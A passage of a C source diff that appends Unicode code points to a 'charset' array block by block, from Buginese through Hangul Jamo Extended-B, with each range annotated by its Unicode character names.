+	charset[i++] = 0x1a1e;	// BUGINESE PALLAWA
+	charset[i++] = 0x1a1f;	// BUGINESE END OF SECTION
+// 1A20..1AAF; Tai Tham
+	c = 0x1a20;		// from TAI THAM LETTER HIGH KA
+	while (c <= 0x1a5e)	// ..to TAI THAM CONSONANT SIGN SA
+		charset[i++] = c++;
+	c = 0x1a60;		// from TAI THAM SIGN SAKOT
+	while (c <= 0x1a7c)	// ..to TAI THAM SIGN KHUEN-LUE KARAN
+		charset[i++] = c++;
+	c = 0x1a7f;		// from TAI THAM COMBINING CRYPTOGRAMMIC DOT
+	while (c <= 0x1a89)	// ..to TAI THAM HORA DIGIT NINE
+		charset[i++] = c++;
+	c = 0x1a90;		// from TAI THAM THAM DIGIT ZERO
+	while (c <= 0x1a99)	// ..to TAI THAM THAM DIGIT NINE
+		charset[i++] = c++;
+	c = 0x1aa0;		// from TAI THAM SIGN WIANG
+	while (c <= 0x1aad)	// ..to TAI THAM SIGN CAANG
+		charset[i++] = c++;
+// 1AB0..1AFF; Combining Diacritical Marks Extended
+	c = 0x1ab0;		// from COMBINING DOUBLED CIRCUMFLEX ACCENT
+	while (c <= 0x1abe)	// ..to COMBINING PARENTHESES OVERLAY
+		charset[i++] = c++;
+// 1B00..1B7F; Balinese
+	c = 0x1b00;		// from BALINESE SIGN ULU RICEM
+	while (c <= 0x1b4b)	// ..to BALINESE LETTER ASYURA SASAK
+		charset[i++] = c++;
+	c = 0x1b50;		// from BALINESE DIGIT ZERO
+	while (c <= 0x1b7c)	// ..to BALINESE MUSICAL SYMBOL LEFT-HAND OPEN PING
+		charset[i++] = c++;
+// 1B80..1BBF; Sundanese
+	c = 0x1b80;		// from SUNDANESE SIGN PANYECEK
+	while (c <= 0x1bbf)	// ..to SUNDANESE LETTER FINAL M
+		charset[i++] = c++;
+// 1BC0..1BFF; Batak
+	c = 0x1bc0;		// from BATAK LETTER A
+	while (c <= 0x1bf3)	// ..to BATAK PANONGONAN
+		charset[i++] = c++;
+	c = 0x1bfc;		// from BATAK SYMBOL BINDU NA METEK
+	while (c <= 0x1bff)	// ..to BATAK SYMBOL BINDU PANGOLAT
+		charset[i++] = c++;
+// 1C00..1C4F; Lepcha
+	c = 0x1c00;		// from LEPCHA LETTER KA
+	while (c <= 0x1c37)	// ..to LEPCHA SIGN NUKTA
+		charset[i++] = c++;
+	c = 0x1c3b;		// from LEPCHA PUNCTUATION TA-ROL
+	while (c <= 0x1c49)	// ..to LEPCHA DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0x1c4d;	// LEPCHA LETTER TTA
+	charset[i++] = 0x1c4f;	// LEPCHA LETTER DDA
+// 1C50..1C7F; Ol Chiki
+	c = 0x1c50;		// from OL CHIKI DIGIT ZERO
+	while (c <= 0x1c7f)	// ..to OL CHIKI PUNCTUATION DOUBLE MUCAAD
+		charset[i++] = c++;
+// 1C80..1C8F; Cyrillic Extended-C
+	c = 0x1c80;		// from CYRILLIC SMALL LETTER ROUNDED VE
+	while (c <= 0x1c88)	// ..to CYRILLIC SMALL LETTER UNBLENDED UK
+		charset[i++] = c++;
+// 1C90..1CBF; Georgian Extended
+	c = 0x1c90;		// from GEORGIAN MTAVRULI CAPITAL LETTER AN
+	while (c <= 0x1cba)	// ..to GEORGIAN MTAVRULI CAPITAL LETTER AIN
+		charset[i++] = c++;
+	charset[i++] = 0x1cbd;	// GEORGIAN MTAVRULI CAPITAL LETTER AEN
+	charset[i++] = 0x1cbf;	// GEORGIAN MTAVRULI CAPITAL LETTER LABIAL SIGN
+// 1CC0..1CCF; Sundanese Supplement
+	c = 0x1cc0;		// from SUNDANESE PUNCTUATION BINDU SURYA
+	while (c <= 0x1cc7)	// ..to SUNDANESE PUNCTUATION BINDU BA SATANGA
+		charset[i++] = c++;
+// 1CD0..1CFF; Vedic Extensions
+	c = 0x1cd0;		// from VEDIC TONE KARSHANA
+	while (c <= 0x1cf9)	// ..to VEDIC TONE DOUBLE RING ABOVE
+		charset[i++] = c++;
+// 1D00..1D7F; Phonetic Extensions
+	c = 0x1d00;		// from LATIN LETTER SMALL CAPITAL A
+	while (c <= 0x1d7f)	// ..to LATIN SMALL LETTER UPSILON WITH STROKE
+		charset[i++] = c++;
+// 1D80..1DBF; Phonetic Extensions Supplement
+	c = 0x1d80;		// from LATIN SMALL LETTER B WITH PALATAL HOOK
+	while (c <= 0x1dbf)	// ..to MODIFIER LETTER SMALL THETA
+		charset[i++] = c++;
+// 1DC0..1DFF; Combining Diacritical Marks Supplement
+	c = 0x1dc0;		// from COMBINING DOTTED GRAVE ACCENT
+	while (c <= 0x1df9)	// ..to COMBINING WIDE INVERTED BRIDGE BELOW
+		charset[i++] = c++;
+	c = 0x1dfb;		// from COMBINING DELETION MARK
+	while (c <= 0x1dff)	// ..to COMBINING RIGHT ARROWHEAD AND DOWN ARROWHEAD BELOW
+		charset[i++] = c++;
+// 1E00..1EFF; Latin Extended Additional
+	c = 0x1e00;		// from LATIN CAPITAL LETTER A WITH RING BELOW
+	while (c <= 0x1eff)	// ..to LATIN SMALL LETTER Y WITH LOOP
+		charset[i++] = c++;
+// 1F00..1FFF; Greek Extended
+	c = 0x1f00;		// from GREEK SMALL LETTER ALPHA WITH PSILI
+	while (c <= 0x1f15)	// ..to GREEK SMALL LETTER EPSILON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f18;		// from GREEK CAPITAL LETTER EPSILON WITH PSILI
+	while (c <= 0x1f1d)	// ..to GREEK CAPITAL LETTER EPSILON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f20;		// from GREEK SMALL LETTER ETA WITH PSILI
+	while (c <= 0x1f45)	// ..to GREEK SMALL LETTER OMICRON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f48;		// from GREEK CAPITAL LETTER OMICRON WITH PSILI
+	while (c <= 0x1f4d)	// ..to GREEK CAPITAL LETTER OMICRON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f50;		// from GREEK SMALL LETTER UPSILON WITH PSILI
+	while (c <= 0x1f57)	// ..to GREEK SMALL LETTER UPSILON WITH DASIA AND PERISPOMENI
+		charset[i++] = c++;
+	c = 0x1f5f;		// from GREEK CAPITAL LETTER UPSILON WITH DASIA AND PERISPOMENI
+	while (c <= 0x1f7d)	// ..to GREEK SMALL LETTER OMEGA WITH OXIA
+		charset[i++] = c++;
+	c = 0x1f80;		// from GREEK SMALL LETTER ALPHA WITH PSILI AND YPOGEGRAMMENI
+	while (c <= 0x1fb4)	// ..to GREEK SMALL LETTER ALPHA WITH OXIA AND YPOGEGRAMMENI
+		charset[i++] = c++;
+	c = 0x1fb6;		// from GREEK SMALL LETTER ALPHA WITH PERISPOMENI
+	while (c <= 0x1fc4)	// ..to GREEK SMALL LETTER ETA WITH OXIA AND YPOGEGRAMMENI
+		charset[i++] = c++;
+	c = 0x1fc6;		// from GREEK SMALL LETTER ETA WITH PERISPOMENI
+	while (c <= 0x1fd3)	// ..to GREEK SMALL LETTER IOTA WITH DIALYTIKA AND OXIA
+		charset[i++] = c++;
+	c = 0x1fd6;		// from GREEK SMALL LETTER IOTA WITH PERISPOMENI
+	while (c <= 0x1fdb)	// ..to GREEK CAPITAL LETTER IOTA WITH OXIA
+		charset[i++] = c++;
+	c = 0x1fdd;		// from GREEK DASIA AND VARIA
+	while (c <= 0x1fef)	// ..to GREEK VARIA
+		charset[i++] = c++;
+	charset[i++] = 0x1ff2;	// GREEK SMALL LETTER OMEGA WITH VARIA AND YPOGEGRAMMENI
+	charset[i++] = 0x1ff4;	// GREEK SMALL LETTER OMEGA WITH OXIA AND YPOGEGRAMMENI
+	c = 0x1ff6;		// from GREEK SMALL LETTER OMEGA WITH PERISPOMENI
+	while (c <= 0x1ffe)	// ..to GREEK DASIA
+		charset[i++] = c++;
+// 2000..206F; General Punctuation
+	c = 0x2000;		// from EN QUAD
+	while (c <= 0x2064)	// ..to INVISIBLE PLUS
+		charset[i++] = c++;
+	c = 0x2066;		// from LEFT-TO-RIGHT ISOLATE
+	while (c <= 0x206f)	// ..to NOMINAL DIGIT SHAPES
+		charset[i++] = c++;
+// 2070..209F; Superscripts and Subscripts
+	charset[i++] = 0x2070;	// SUPERSCRIPT ZERO
+	charset[i++] = 0x2071;	// SUPERSCRIPT LATIN SMALL LETTER I
+	c = 0x2074;		// from SUPERSCRIPT FOUR
+	while (c <= 0x208e)	// ..to SUBSCRIPT RIGHT PARENTHESIS
+		charset[i++] = c++;
+	c = 0x2090;		// from LATIN SUBSCRIPT SMALL LETTER A
+	while (c <= 0x209c)	// ..to LATIN SUBSCRIPT SMALL LETTER T
+		charset[i++] = c++;
+// 20A0..20CF; Currency Symbols
+	c = 0x20a0;		// from EURO-CURRENCY SIGN
+	while (c <= 0x20bf)	// ..to BITCOIN SIGN
+		charset[i++] = c++;
+// 20D0..20FF; Combining Diacritical Marks for Symbols
+	c = 0x20d0;		// from COMBINING LEFT HARPOON ABOVE
+	while (c <= 0x20f0)	// ..to COMBINING ASTERISK ABOVE
+		charset[i++] = c++;
+// 2100..214F; Letterlike Symbols
+	c = 0x2100;		// from ACCOUNT OF
+	while (c <= 0x214f)	// ..to SYMBOL FOR SAMARITAN SOURCE
+		charset[i++] = c++;
+// 2150..218F; Number Forms
+	c = 0x2150;		// from VULGAR FRACTION ONE SEVENTH
+	while (c <= 0x218b)	// ..to TURNED DIGIT THREE
+		charset[i++] = c++;
+// 2190..21FF; Arrows
+	c = 0x2190;		// from LEFTWARDS ARROW
+	while (c <= 0x21ff)	// ..to LEFT RIGHT OPEN-HEADED ARROW
+		charset[i++] = c++;
+// 2200..22FF; Mathematical Operators
+	c = 0x2200;		// from FOR ALL
+	while (c <= 0x22ff)	// ..to Z NOTATION BAG MEMBERSHIP
+		charset[i++] = c++;
+// 2300..23FF; Miscellaneous Technical
+	c = 0x2300;		// from DIAMETER SIGN
+	while (c <= 0x23ff)	// ..to OBSERVER EYE SYMBOL
+		charset[i++] = c++;
+// 2400..243F; Control Pictures
+	c = 0x2400;		// from SYMBOL FOR NULL
+	while (c <= 0x2426)	// ..to SYMBOL FOR SUBSTITUTE FORM TWO
+		charset[i++] = c++;
+// 2440..245F; Optical Character Recognition
+	c = 0x2440;		// from OCR HOOK
+	while (c <= 0x244a)	// ..to OCR DOUBLE BACKSLASH
+		charset[i++] = c++;
+// 2460..24FF; Enclosed Alphanumerics
+	c = 0x2460;		// from CIRCLED DIGIT ONE
+	while (c <= 0x24ff)	// ..to NEGATIVE CIRCLED DIGIT ZERO
+		charset[i++] = c++;
+// 2500..257F; Box Drawing
+	c = 0x2500;		// from BOX DRAWINGS LIGHT HORIZONTAL
+	while (c <= 0x257f)	// ..to BOX DRAWINGS HEAVY UP AND LIGHT DOWN
+		charset[i++] = c++;
+// 2580..259F; Block Elements
+	c = 0x2580;		// from UPPER HALF BLOCK
+	while (c <= 0x259f)	// ..to QUADRANT UPPER RIGHT AND LOWER LEFT AND LOWER RIGHT
+		charset[i++] = c++;
+// 25A0..25FF; Geometric Shapes
+	c = 0x25a0;		// from BLACK SQUARE
+	while (c <= 0x25ff)	// ..to LOWER RIGHT TRIANGLE
+		charset[i++] = c++;
+// 2600..26FF; Miscellaneous Symbols
+	c = 0x2600;		// from BLACK SUN WITH RAYS
+	while (c <= 0x26ff)	// ..to WHITE FLAG WITH HORIZONTAL MIDDLE BLACK STRIPE
+		charset[i++] = c++;
+// 2700..27BF; Dingbats
+	c = 0x2700;		// from BLACK SAFETY SCISSORS
+	while (c <= 0x27bf)	// ..to DOUBLE CURLY LOOP
+		charset[i++] = c++;
+// 27C0..27EF; Miscellaneous Mathematical Symbols-A
+	c = 0x27c0;		// from THREE DIMENSIONAL ANGLE
+	while (c <= 0x27ef)	// ..to MATHEMATICAL RIGHT FLATTENED PARENTHESIS
+		charset[i++] = c++;
+// 27F0..27FF; Supplemental Arrows-A
+	c = 0x27f0;		// from UPWARDS QUADRUPLE ARROW
+	while (c <= 0x27ff)	// ..to LONG RIGHTWARDS SQUIGGLE ARROW
+		charset[i++] = c++;
+// 2800..28FF; Braille Patterns
+	c = 0x2800;		// from BRAILLE PATTERN BLANK
+	while (c <= 0x28ff)	// ..to BRAILLE PATTERN DOTS-12345678
+		charset[i++] = c++;
+// 2900..297F; Supplemental Arrows-B
+	c = 0x2900;		// from RIGHTWARDS TWO-HEADED ARROW WITH VERTICAL STROKE
+	while (c <= 0x297f)	// ..to DOWN FISH TAIL
+		charset[i++] = c++;
+// 2980..29FF; Miscellaneous Mathematical Symbols-B
+	c = 0x2980;		// from TRIPLE VERTICAL BAR DELIMITER
+	while (c <= 0x29ff)	// ..to MINY
+		charset[i++] = c++;
+// 2A00..2AFF; Supplemental Mathematical Operators
+	c = 0x2a00;		// from N-ARY CIRCLED DOT OPERATOR
+	while (c <= 0x2aff)	// ..to N-ARY WHITE VERTICAL BAR
+		charset[i++] = c++;
+// 2B00..2BFF; Miscellaneous Symbols and Arrows
+	c = 0x2b00;		// from NORTH EAST WHITE ARROW
+	while (c <= 0x2b73)	// ..to DOWNWARDS TRIANGLE-HEADED ARROW TO BAR
+		charset[i++] = c++;
+	c = 0x2b76;		// from NORTH WEST TRIANGLE-HEADED ARROW TO BAR
+	while (c <= 0x2b95)	// ..to RIGHTWARDS BLACK ARROW
+		charset[i++] = c++;
+	c = 0x2b98;		// from THREE-D TOP-LIGHTED LEFTWARDS EQUILATERAL ARROWHEAD
+	while (c <= 0x2bc8)	// ..to BLACK MEDIUM RIGHT-POINTING TRIANGLE CENTRED
+		charset[i++] = c++;
+	c = 0x2bca;		// from TOP HALF BLACK CIRCLE
+	while (c <= 0x2bfe)	// ..to REVERSED RIGHT ANGLE
+		charset[i++] = c++;
+// 2C00..2C5F; Glagolitic
+	c = 0x2c00;		// from GLAGOLITIC CAPITAL LETTER AZU
+	while (c <= 0x2c2e)	// ..to GLAGOLITIC CAPITAL LETTER LATINATE MYSLITE
+		charset[i++] = c++;
+	c = 0x2c30;		// from GLAGOLITIC SMALL LETTER AZU
+	while (c <= 0x2c5e)	// ..to GLAGOLITIC SMALL LETTER LATINATE MYSLITE
+		charset[i++] = c++;
+// 2C60..2C7F; Latin Extended-C
+	c = 0x2c60;		// from LATIN CAPITAL LETTER L WITH DOUBLE BAR
+	while (c <= 0x2c7f)	// ..to LATIN CAPITAL LETTER Z WITH SWASH TAIL
+		charset[i++] = c++;
+// 2C80..2CFF; Coptic
+	c = 0x2c80;		// from COPTIC CAPITAL LETTER ALFA
+	while (c <= 0x2cf3)	// ..to COPTIC SMALL LETTER BOHAIRIC KHEI
+		charset[i++] = c++;
+	c = 0x2cf9;		// from COPTIC OLD NUBIAN FULL STOP
+	while (c <= 0x2cff)	// ..to COPTIC MORPHOLOGICAL DIVIDER
+		charset[i++] = c++;
+// 2D00..2D2F; Georgian Supplement
+	c = 0x2d00;		// from GEORGIAN SMALL LETTER AN
+	while (c <= 0x2d25)	// ..to GEORGIAN SMALL LETTER HOE
+		charset[i++] = c++;
+	c = 0x2d27;		// from GEORGIAN SMALL LETTER YN
+	while (c <= 0x2d2d)	// ..to GEORGIAN SMALL LETTER AEN
+		charset[i++] = c++;
+// 2D30..2D7F; Tifinagh
+	c = 0x2d30;		// from TIFINAGH LETTER YA
+	while (c <= 0x2d67)	// ..to TIFINAGH LETTER YO
+		charset[i++] = c++;
+	charset[i++] = 0x2d6f;	// TIFINAGH MODIFIER LETTER LABIALIZATION MARK
+	charset[i++] = 0x2d70;	// TIFINAGH SEPARATOR MARK
+	charset[i++] = 0x2d7f;	// TIFINAGH CONSONANT JOINER
+// 2D80..2DDF; Ethiopic Extended
+	c = 0x2d80;		// from ETHIOPIC SYLLABLE LOA
+	while (c <= 0x2d96)	// ..to ETHIOPIC SYLLABLE GGWE
+		charset[i++] = c++;
+	c = 0x2da0;		// from ETHIOPIC SYLLABLE SSA
+	while (c <= 0x2da6)	// ..to ETHIOPIC SYLLABLE SSO
+		charset[i++] = c++;
+	c = 0x2da8;		// from ETHIOPIC SYLLABLE CCA
+	while (c <= 0x2dae)	// ..to ETHIOPIC SYLLABLE CCO
+		charset[i++] = c++;
+	c = 0x2db0;		// from ETHIOPIC SYLLABLE ZZA
+	while (c <= 0x2db6)	// ..to ETHIOPIC SYLLABLE ZZO
+		charset[i++] = c++;
+	c = 0x2db8;		// from ETHIOPIC SYLLABLE CCHA
+	while (c <= 0x2dbe)	// ..to ETHIOPIC SYLLABLE CCHO
+		charset[i++] = c++;
+	c = 0x2dc0;		// from ETHIOPIC SYLLABLE QYA
+	while (c <= 0x2dc6)	// ..to ETHIOPIC SYLLABLE QYO
+		charset[i++] = c++;
+	c = 0x2dc8;		// from ETHIOPIC SYLLABLE KYA
+	while (c <= 0x2dce)	// ..to ETHIOPIC SYLLABLE KYO
+		charset[i++] = c++;
+	c = 0x2dd0;		// from ETHIOPIC SYLLABLE XYA
+	while (c <= 0x2dd6)	// ..to ETHIOPIC SYLLABLE XYO
+		charset[i++] = c++;
+	c = 0x2dd8;		// from ETHIOPIC SYLLABLE GYA
+	while (c <= 0x2dde)	// ..to ETHIOPIC SYLLABLE GYO
+		charset[i++] = c++;
+// 2DE0..2DFF; Cyrillic Extended-A
+	c = 0x2de0;		// from COMBINING CYRILLIC LETTER BE
+	while (c <= 0x2dff)	// ..to COMBINING CYRILLIC LETTER IOTIFIED BIG YUS
+		charset[i++] = c++;
+// 2E00..2E7F; Supplemental Punctuation
+	c = 0x2e00;		// from RIGHT ANGLE SUBSTITUTION MARKER
+	while (c <= 0x2e4e)	// ..to PUNCTUS ELEVATUS MARK
+		charset[i++] = c++;
+// 2E80..2EFF; CJK Radicals Supplement
+	c = 0x2e80;		// from CJK RADICAL REPEAT
+	while (c <= 0x2e99)	// ..to CJK RADICAL RAP
+		charset[i++] = c++;
+	c = 0x2e9b;		// from CJK RADICAL CHOKE
+	while (c <= 0x2ef3)	// ..to CJK RADICAL C-SIMPLIFIED TURTLE
+		charset[i++] = c++;
+// 2F00..2FDF; Kangxi Radicals
+	c = 0x2f00;		// from KANGXI RADICAL ONE
+	while (c <= 0x2fd5)	// ..to KANGXI RADICAL FLUTE
+		charset[i++] = c++;
+// 2FF0..2FFF; Ideographic Description Characters
+	c = 0x2ff0;		// from IDEOGRAPHIC DESCRIPTION CHARACTER LEFT TO RIGHT
+	while (c <= 0x2ffb)	// ..to IDEOGRAPHIC DESCRIPTION CHARACTER OVERLAID
+		charset[i++] = c++;
+// 3000..303F; CJK Symbols and Punctuation
+	c = 0x3000;		// from IDEOGRAPHIC SPACE
+	while (c <= 0x303f)	// ..to IDEOGRAPHIC HALF FILL SPACE
+		charset[i++] = c++;
+// 3040..309F; Hiragana
+	c = 0x3041;		// from HIRAGANA LETTER SMALL A
+	while (c <= 0x3096)	// ..to HIRAGANA LETTER SMALL KE
+		charset[i++] = c++;
+	c = 0x3099;		// from COMBINING KATAKANA-HIRAGANA VOICED SOUND MARK
+	while (c <= 0x309f)	// ..to HIRAGANA DIGRAPH YORI
+		charset[i++] = c++;
+// 30A0..30FF; Katakana
+	c = 0x30a0;		// from KATAKANA-HIRAGANA DOUBLE HYPHEN
+	while (c <= 0x30ff)	// ..to KATAKANA DIGRAPH KOTO
+		charset[i++] = c++;
+// 3100..312F; Bopomofo
+	c = 0x3105;		// from BOPOMOFO LETTER B
+	while (c <= 0x312f)	// ..to BOPOMOFO LETTER NN
+		charset[i++] = c++;
+// 3130..318F; Hangul Compatibility Jamo
+	c = 0x3131;		// from HANGUL LETTER KIYEOK
+	while (c <= 0x318e)	// ..to HANGUL LETTER ARAEAE
+		charset[i++] = c++;
+// 3190..319F; Kanbun
+	c = 0x3190;		// from IDEOGRAPHIC ANNOTATION LINKING MARK
+	while (c <= 0x319f)	// ..to IDEOGRAPHIC ANNOTATION MAN MARK
+		charset[i++] = c++;
+// 31A0..31BF; Bopomofo Extended
+	c = 0x31a0;		// from BOPOMOFO LETTER BU
+	while (c <= 0x31ba)	// ..to BOPOMOFO LETTER ZY
+		charset[i++] = c++;
+// 31C0..31EF; CJK Strokes
+	c = 0x31c0;		// from CJK STROKE T
+	while (c <= 0x31e3)	// ..to CJK STROKE Q
+		charset[i++] = c++;
+// 31F0..31FF; Katakana Phonetic Extensions
+	c = 0x31f0;		// from KATAKANA LETTER SMALL KU
+	while (c <= 0x31ff)	// ..to KATAKANA LETTER SMALL RO
+		charset[i++] = c++;
+// 3200..32FF; Enclosed CJK Letters and Months
+	c = 0x3200;		// from PARENTHESIZED HANGUL KIYEOK
+	while (c <= 0x321e)	// ..to PARENTHESIZED KOREAN CHARACTER O HU
+		charset[i++] = c++;
+	c = 0x3220;		// from PARENTHESIZED IDEOGRAPH ONE
+	while (c <= 0x32fe)	// ..to CIRCLED KATAKANA WO
+		charset[i++] = c++;
+// 3300..33FF; CJK Compatibility
+	c = 0x3300;		// from SQUARE APAATO
+	while (c <= 0x33ff)	// ..to SQUARE GAL
+		charset[i++] = c++;
+// 3400..4DBF; CJK Unified Ideographs Extension A
+	c = 0x3400;		// from <CJK Ideograph Extension A, First>
+	while (c <= 0x4db5)	// ..to <CJK Ideograph Extension A, Last>
+		charset[i++] = c++;
+// 4DC0..4DFF; Yijing Hexagram Symbols
+	c = 0x4dc0;		// from HEXAGRAM FOR THE CREATIVE HEAVEN
+	while (c <= 0x4dff)	// ..to HEXAGRAM FOR BEFORE COMPLETION
+		charset[i++] = c++;
+// 4E00..9FFF; CJK Unified Ideographs
+	c = 0x4e00;		// from <CJK Ideograph, First>
+	while (c <= 0x9fef)	// ..to <CJK Ideograph, Last>
+		charset[i++] = c++;
+// A000..A48F; Yi Syllables
+	c = 0xa000;		// from YI SYLLABLE IT
+	while (c <= 0xa48c)	// ..to YI SYLLABLE YYR
+		charset[i++] = c++;
+// A490..A4CF; Yi Radicals
+	c = 0xa490;		// from YI RADICAL QOT
+	while (c <= 0xa4c6)	// ..to YI RADICAL KE
+		charset[i++] = c++;
+// A4D0..A4FF; Lisu
+	c = 0xa4d0;		// from LISU LETTER BA
+	while (c <= 0xa4ff)	// ..to LISU PUNCTUATION FULL STOP
+		charset[i++] = c++;
+// A500..A63F; Vai
+	c = 0xa500;		// from VAI SYLLABLE EE
+	while (c <= 0xa62b)	// ..to VAI SYLLABLE NDOLE DO
+		charset[i++] = c++;
+// A640..A69F; Cyrillic Extended-B
+	c = 0xa640;		// from CYRILLIC CAPITAL LETTER ZEMLYA
+	while (c <= 0xa69f)	// ..to COMBINING CYRILLIC LETTER IOTIFIED E
+		charset[i++] = c++;
+// A6A0..A6FF; Bamum
+	c = 0xa6a0;		// from BAMUM LETTER A
+	while (c <= 0xa6f7)	// ..to BAMUM QUESTION MARK
+		charset[i++] = c++;
+// A700..A71F; Modifier Tone Letters
+	c = 0xa700;		// from MODIFIER LETTER CHINESE TONE YIN PING
+	while (c <= 0xa71f)	// ..to MODIFIER LETTER LOW INVERTED EXCLAMATION MARK
+		charset[i++] = c++;
+// A720..A7FF; Latin Extended-D
+	c = 0xa720;		// from MODIFIER LETTER STRESS AND HIGH TONE
+	while (c <= 0xa7b9)	// ..to LATIN SMALL LETTER U WITH STROKE
+		charset[i++] = c++;
+	c = 0xa7f7;		// from LATIN EPIGRAPHIC LETTER SIDEWAYS I
+	while (c <= 0xa7ff)	// ..to LATIN EPIGRAPHIC LETTER ARCHAIC M
+		charset[i++] = c++;
+// A800..A82F; Syloti Nagri
+	c = 0xa800;		// from SYLOTI NAGRI LETTER A
+	while (c <= 0xa82b)	// ..to SYLOTI NAGRI POETRY MARK-4
+		charset[i++] = c++;
+// A830..A83F; Common Indic Number Forms
+	c = 0xa830;		// from NORTH INDIC FRACTION ONE QUARTER
+	while (c <= 0xa839)	// ..to NORTH INDIC QUANTITY MARK
+		charset[i++] = c++;
+// A840..A87F; Phags-pa
+	c = 0xa840;		// from PHAGS-PA LETTER KA
+	while (c <= 0xa877)	// ..to PHAGS-PA MARK DOUBLE SHAD
+		charset[i++] = c++;
+// A880..A8DF; Saurashtra
+	c = 0xa880;		// from SAURASHTRA SIGN ANUSVARA
+	while (c <= 0xa8c5)	// ..to SAURASHTRA SIGN CANDRABINDU
+		charset[i++] = c++;
+	c = 0xa8ce;		// from SAURASHTRA DANDA
+	while (c <= 0xa8d9)	// ..to SAURASHTRA DIGIT NINE
+		charset[i++] = c++;
+// A8E0..A8FF; Devanagari Extended
+	c = 0xa8e0;		// from COMBINING DEVANAGARI DIGIT ZERO
+	while (c <= 0xa8ff)	// ..to DEVANAGARI VOWEL SIGN AY
+		charset[i++] = c++;
+// A900..A92F; Kayah Li
+	c = 0xa900;		// from KAYAH LI DIGIT ZERO
+	while (c <= 0xa92f)	// ..to KAYAH LI SIGN SHYA
+		charset[i++] = c++;
+// A930..A95F; Rejang
+	c = 0xa930;		// from REJANG LETTER KA
+	while (c <= 0xa953)	// ..to REJANG VIRAMA
+		charset[i++] = c++;
+	charset[i++] = 0xa95f;	// REJANG SECTION MARK
+// A960..A97F; Hangul Jamo Extended-A
+	c = 0xa960;		// from HANGUL CHOSEONG TIKEUT-MIEUM
+	while (c <= 0xa97c)	// ..to HANGUL CHOSEONG SSANGYEORINHIEUH
+		charset[i++] = c++;
+// A980..A9DF; Javanese
+	c = 0xa980;		// from JAVANESE SIGN PANYANGGA
+	while (c <= 0xa9cd)	// ..to JAVANESE TURNED PADA PISELEH
+		charset[i++] = c++;
+	c = 0xa9cf;		// from JAVANESE PANGRANGKEP
+	while (c <= 0xa9d9)	// ..to JAVANESE DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0xa9de;	// JAVANESE PADA TIRTA TUMETES
+	charset[i++] = 0xa9df;	// JAVANESE PADA ISEN-ISEN
+// A9E0..A9FF; Myanmar Extended-B
+	c = 0xa9e0;		// from MYANMAR LETTER SHAN GHA
+	while (c <= 0xa9fe)	// ..to MYANMAR LETTER TAI LAING BHA
+		charset[i++] = c++;
+// AA00..AA5F; Cham
+	c = 0xaa00;		// from CHAM LETTER A
+	while (c <= 0xaa36)	// ..to CHAM CONSONANT SIGN WA
+		charset[i++] = c++;
+	c = 0xaa40;		// from CHAM LETTER FINAL K
+	while (c <= 0xaa4d)	// ..to CHAM CONSONANT SIGN FINAL H
+		charset[i++] = c++;
+	c = 0xaa50;		// from CHAM DIGIT ZERO
+	while (c <= 0xaa59)	// ..to CHAM DIGIT NINE
+		charset[i++] = c++;
+	c = 0xaa5c;		// from CHAM PUNCTUATION SPIRAL
+	while (c <= 0xaa5f)	// ..to CHAM PUNCTUATION TRIPLE DANDA
+		charset[i++] = c++;
+// AA60..AA7F; Myanmar Extended-A
+	c = 0xaa60;		// from MYANMAR LETTER KHAMTI GA
+	while (c <= 0xaa7f)	// ..to MYANMAR LETTER SHWE PALAUNG SHA
+		charset[i++] = c++;
+// AA80..AADF; Tai Viet
+	c = 0xaa80;		// from TAI VIET LETTER LOW KO
+	while (c <= 0xaac2)	// ..to TAI VIET TONE MAI SONG
+		charset[i++] = c++;
+	c = 0xaadb;		// from TAI VIET SYMBOL KON
+	while (c <= 0xaadf)	// ..to TAI VIET SYMBOL KOI KOI
+		charset[i++] = c++;
+// AAE0..AAFF; Meetei Mayek Extensions
+	c = 0xaae0;		// from MEETEI MAYEK LETTER E
+	while (c <= 0xaaf6)	// ..to MEETEI MAYEK VIRAMA
+		charset[i++] = c++;
+// AB00..AB2F; Ethiopic Extended-A
+	c = 0xab01;		// from ETHIOPIC SYLLABLE TTHU
+	while (c <= 0xab06)	// ..to ETHIOPIC SYLLABLE TTHO
+		charset[i++] = c++;
+	c = 0xab09;		// from ETHIOPIC SYLLABLE DDHU
+	while (c <= 0xab0e)	// ..to ETHIOPIC SYLLABLE DDHO
+		charset[i++] = c++;
+	c = 0xab11;		// from ETHIOPIC SYLLABLE DZU
+	while (c <= 0xab16)	// ..to ETHIOPIC SYLLABLE DZO
+		charset[i++] = c++;
+	c = 0xab20;		// from ETHIOPIC SYLLABLE CCHHA
+	while (c <= 0xab26)	// ..to ETHIOPIC SYLLABLE CCHHO
+		charset[i++] = c++;
+	c = 0xab28;		// from ETHIOPIC SYLLABLE BBA
+	while (c <= 0xab2e)	// ..to ETHIOPIC SYLLABLE BBO
+		charset[i++] = c++;
+// AB30..AB6F; Latin Extended-E
+	c = 0xab30;		// from LATIN SMALL LETTER BARRED ALPHA
+	while (c <= 0xab65)	// ..to GREEK LETTER SMALL CAPITAL OMEGA
+		charset[i++] = c++;
+// AB70..ABBF; Cherokee Supplement
+	c = 0xab70;		// from CHEROKEE SMALL LETTER A
+	while (c <= 0xabbf)	// ..to CHEROKEE SMALL LETTER YA
+		charset[i++] = c++;
+// ABC0..ABFF; Meetei Mayek
+	c = 0xabc0;		// from MEETEI MAYEK LETTER KOK
+	while (c <= 0xabed)	// ..to MEETEI MAYEK APUN IYEK
+		charset[i++] = c++;
+	c = 0xabf0;		// from MEETEI MAYEK DIGIT ZERO
+	while (c <= 0xabf9)	// ..to MEETEI MAYEK DIGIT NINE
+		charset[i++] = c++;
+// AC00..D7AF; Hangul Syllables
+	c = 0xac00;		// from <Hangul Syllable, First>
+	while (c <= 0xd7a3)	// ..to <Hangul Syllable, Last>
+		charset[i++] = c++;
+// D7B0..D7FF; Hangul Jamo Extended-B
+	c = 0xd7b0;		// from HANGUL JUNGSEONG O-YEO
+	while (c <= 0xd7c6)	// ..to HANGUL JUNGSEONG ARAEA-E
+		charset[i++] = c++;
+	c = 0xd7cb;		// from HANGUL JONGSEONG NIEUN-RIEUL
+	while (c <= 0xd7fb)	// ..to HANGUL JONGSEONG PHIEUPH-THIEUTH
+		charset[i++] = c++;
+// D800..DB7F; High Surrogates
